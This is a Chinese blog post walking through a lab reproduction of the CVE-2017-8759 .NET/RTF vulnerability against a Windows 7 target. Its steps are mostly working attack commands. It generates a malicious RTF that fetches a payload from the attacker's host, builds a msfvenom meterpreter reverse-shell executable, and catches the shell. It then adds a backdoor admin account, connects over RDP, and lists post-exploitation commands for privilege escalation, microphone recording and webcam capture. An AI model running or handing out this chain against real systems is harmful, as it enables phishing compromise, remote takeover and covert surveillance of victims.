Skip to content
Menu
0xdawn's blog
  • 首页
  • 关于我
  • 联系方式
0xdawn's blog
2019年1月7日2020年3月25日

CVE-2017-8759漏洞复现

0x01 虚拟机kali-linux、win7靶机

  • 1.为了方便起见,直接利用GitHub上的一个POC。

    git clone https://github.com/bhdresh/CVE-2017-8759.git

  • 2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件。

    python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.50.132/logo.txt

  • 3.利用msfVENOM生成一个反弹shell的exe文件,命名为shell.exe。

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.50.132 LPORT=4444 -f exe > /root/shell.exe

  • 4.监听来自木马文件执行后反弹的shell。

    python cve-2017-8759_toolkit.py -M exp -e http://192.168.50.132/shell.exe -l/root/shell.exe

  • 5.开启metasploit的监听模块进行监听,设置响应载荷以及监听IP。

  • 6.将恶意rtf文件发送到win7靶机上。当恶意文件被执行后,msf监听到反弹shell,然后建立会话连接,即可获取靶机控制权。

0x02 对win7靶机实现控制

  • 1.新建账号并加入管理组

  • 2.利用远程桌面客户端连接靶机的远程桌面服务

    rdesktop -u hacker -p 123456 192.168.50.134(此处为靶机IP)

0x03 其他的一些骚操作

  • sysinfo 获取系统信息

  • getsystem 获取高权限

  • reg 修改注册表

  • record_mic 音频录制

  • webcam_stream 摄像头视频获取

  有时候,禁锢我们的,不是环境设下的牢笼,不是他人施与的压力,而是我们自己把自己局限在狭隘的空间里,在无端中迷失了自我.

云烟成雨

https://www.0xdawn.cn/wp-content/uploads/2019/11/房东的猫-云烟成雨.mp3

文章检索

分类

  • CTF
  • 代码审计
  • 学习笔记
  • 渗透测试
  • 漏洞演练

近期文章

  • 2021长城杯 Write up by D0g3
  • 2021网刃杯 write up
  • 2021羊城杯 Web Write up
  • 第五届蓝帽杯总决赛 write up
  • 第五届强网杯Web部分 write up

归档

联系我们

地址
成都信息工程大学

Email
yan@0xdawn.cn

QQ
1115230222

©2022 0xdawn's blog | Powered by WordPress and Superb Themes!